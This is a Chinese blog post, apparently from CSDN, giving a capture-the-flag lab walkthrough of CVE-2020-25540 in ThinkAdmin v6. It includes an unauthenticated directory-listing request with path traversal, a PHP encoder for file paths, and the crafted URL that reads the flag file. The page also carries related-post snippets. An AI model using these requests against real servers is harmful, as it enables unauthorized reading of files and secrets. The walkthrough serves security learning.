春秋云镜 CVE-2020-25540

已于 2023-08-07 15:03:30 修改
阅读量467 收藏 2
点赞数 1
分类专栏: 靶场 文章标签: 安全 web安全
于 2023-08-07 15:01:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/132143462
版权

春秋云镜 CVE-2020-25540 Thinkadmin v6任意文件读取漏洞

靶标介绍

ThinkAdmin 6版本存在路径查找漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

启动场景

在这里插入图片描述

漏洞利用

1、未授权列目录poc

读取网站根目录Payload: http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node
POST:

rules=[“/”]
rules=[“…/…/…/”] (目录穿越)

在这里插入图片描述
2、任意文件读取
使用加密函数对文件名进行加密

<?php
function encode($content)
{
    [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
    return $chars;
}
$content="../../../flag";
echo encode($content);
?>

在这里插入图片描述
加密后的文件名为1a1a1b1a1a1b1a1a1b2u302p2v
请求http://eci-2ze3dysieeo26l90ip96.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2u302p2v
在这里插入图片描述
base64解密得到文件内容
在这里插入图片描述
得到flag

flag{cef71ab7-c930-408d-8074-52350766063b}

isbug0
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-25540)Thinkadmin v6任意文件读取漏洞复现
thelostworld
09-24 887
Thinkadmin v6任意文件读取漏洞CVE-2020-25540)复现 ​ 快结束,抓住HVV的小尾巴,现在有空去复现最近出的漏洞 一、漏洞简介: ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。 二、..
云镜CVE-2020-25540复现
m0_46684679的博客
02-26 542
Thinkadmin v6任意文件读取漏洞
春秋云镜 CVE-2020-2883
qq_22002773的博客
08-05 323
春秋云镜 CVE-2020-2883
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
SAP_RECON:CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞
04-01
CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞) ff! RECON(NetWeaver上的可远程利用代码)? 伙计们,真的吗? 那是您想到的最好的代号? :) 此脚本可检查SAP LM配置向导是否缺少授权检查漏洞,并且PoC...
【Linux安全】Firewalld防火墙基础
最新发布
weixin_62922268的博客
05-23 414
支持网络区域所定义的网络链接以及接口安全等级的动态防火墙管理工具支持IPv4、IPv6防火墙设置以及以太网桥支持服务或应用程序直接添加防火墙规则接口拥有两种配置模式运行时配置永久配置trusted(信任区域):允许所有的传入流量。public(公共区域):允许与ssh或dhcpv6-client预定义服务匹配的传入流量,其余均拒绝。是新添加网络接口的默认区域。external(外部区域):允许与 ssh 预定义服务匹配的传入流量,其余均拒绝。
服务器漏洞安全修复记录
lxw1844912514的博客
05-22 348
Redis中线上使用keys *命令是非常危险的,应该禁用或者限制使用这些危险的命令,可降低Redis写入文件漏洞的入侵风险。描述:设置密码失效时间,强制定期修改密码,减少密码被泄漏和猜测风险,使用非密码登陆方式(如密钥对)请忽略此项。例如,在一个简单的 bash 脚本中,你可以检查用户输入的命令,如果是。重命名为一个难以猜测的命令,以此来减少恶意用户利用默认命令执行未授权操作的风险。但是,需要注意的是,Redis 并没有提供完全禁用命令的机制。命令,你可以考虑修改 Redis 源代码,从源头上移除。
F5发布2024年5月季度安全通告
2401_84434570的博客
05-22 1154
F5 BIG-IP Next Central Manager OData注入漏洞。F5 BIG-IP Next Central Manager SQL注入漏洞。F5 BIG-IP Next Central Manager中间人攻击漏洞。F5 BIG-IP Next Central Manager中间人攻击漏洞。F5 BIG-IP APM浏览器网络访问VPN客户端来源验证错误漏洞。F5 BIG-IP Next CNF信息泄露漏洞。F5 BIG-IP配置实用程序跨站脚本漏洞
RSA与AES:打造高效且超安全的混合加密方案
那仰望的人,心底的孤独和叹息
05-19 534
RSA结合AES混合加密,实现加密账号密码等,工具类代码。 RSA是**非对称加密**的一种,具有两个密钥:公共密钥和私有密钥。公钥和私钥是一对,公钥加密后的内容只有私钥才能解密。两个密钥的不同,所以是非对称的。
如何保护主机的安全
wanhengwangluo的博客
05-23 553
提高主机安全性中必不可少的则是需要定期备份重要数据,为了防止遭到网络攻击造成数据丢失或损坏的情况,在进行数据备份的同时,需要确保备份数据的安全性,进行定期测试备份数据的可恢复性。对于提高主机的安全性我们可以安装正规安全的防火墙措施,使用防火墙可以用来监控和过滤网络流量,阻止一些不良流量的访问,同时管理员也需要定期更新防火墙规则,并且避免使用默认设置。以上就是小编今天分享的内容了,如果还想了解更多内容,或者对服务器感兴趣的话,可以持续关注万恒网络科技,对于不了解和需要进行咨询的地方,也可以私信或评论小编!
绿联硬盘数据恢复方法:安全、高效找回珍贵数据
yqssjhf的博客
05-23 1124
在数字化时代,硬盘承载着大量的个人和企业数据,一旦数据丢失或损坏,后果往往不堪设想。绿联硬盘以其稳定的性能和良好的口碑赢得了众多用户的信赖,但即便如此,数据恢复问题仍然是用户可能面临的一大挑战。本文将为您详细介绍绿联硬盘数据恢复的方法,希望能帮助您安全、高效地找回珍贵数据。
CCF202012-1——期末预测之安全指数
m0_60890170的博客
05-19 215
【代码】CCF202012-1——期末预测之安全指数。
毫米波雷达模块在智能家居安全系统中的关键技术分析
MinewSemi2022的博客
05-22 361
毫米波雷达技术是一种利用毫米波进行无线通信和感知的技术,其工作原理是通过发送和接收毫米波信号,然后分析信号的反射、散射等信息,从而实现对目标物体的探测和跟踪。毫米波雷达技术作为智能家居安全系统中的关键技术之一,其应用已经取得了一定的成就,并且在未来有着广阔的发展前景。毫米波雷达模块推荐使用MS72SF1,这是一款60G的毫米波雷达模块,相对于传统视觉、红外、激光等感知手段,毫米波雷达不受光照影响,能够全天时实现无感主动对室内人员感知监测,且具有个人隐私保护功能,是目前家居场景应用最佳传感器。
漫谈企业信息化安全-综述
SplashtopLoki的博客
05-23 695
一直以来想写一些文章,谈一谈企业信息化过程中的安全问题及对策。随着信息技术的不断发展和普及,特别是今年来移动办公、云服务等等新的工作模式和新的信息技术的应用,企业信息化已经成为提升竞争力、促进创新和发展的重要途径。然而,随之而来的是对信息安全的日益严峻挑战。在这个数字化时代,企业面临着越来越多的网络攻击、数据泄露、身份盗窃等安全威胁,一旦发生安全事件,可能给企业造成巨大的经济损失和声誉风险。面对这样机遇和挑战,企业会采取怎样的心态和措施来应对呢?是忽视风险,盲目上马,总觉得风险离自己很远呢?
勒索病毒的策略与建议
lxzn123的博客
05-23 416
为了防范和应对勒索病毒攻击,我们应该定期备份数据、更新安全软件和系统补丁、提高员工的安全意识、建立应急响应计划,并避免轻易支付赎金。通过综合采取这些措施,我们可以更好地保护个人和企业的数据安全,减少勒索病毒攻击带来的损失。3. 提高员工的安全意识:员工往往是勒索病毒攻击的入口点,因此提高员工的安全意识至关重要。一旦遭受攻击,应立即隔离感染,并采取相应的措施来限制病毒的传播,并尽快恢复受影响的系统。保持操作系统和软件的最新状态,可以有效地防范勒索病毒攻击,减少系统漏洞的风险。
CVE-2020-13249
09-08
根据提供的引用内容,没有包含关于CVE-2020-13249的信息。请提供更多相关信息以便我为您提供准确的答案。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【漏洞通告】Apache DolphinScheduler高危漏洞CVE-2020-11974、CVE-2020-13922)](https://blog.csdn.net/weixin_45728976/article/details/108537133)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE](https://download.csdn.net/download/weixin_42181545/19185756)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值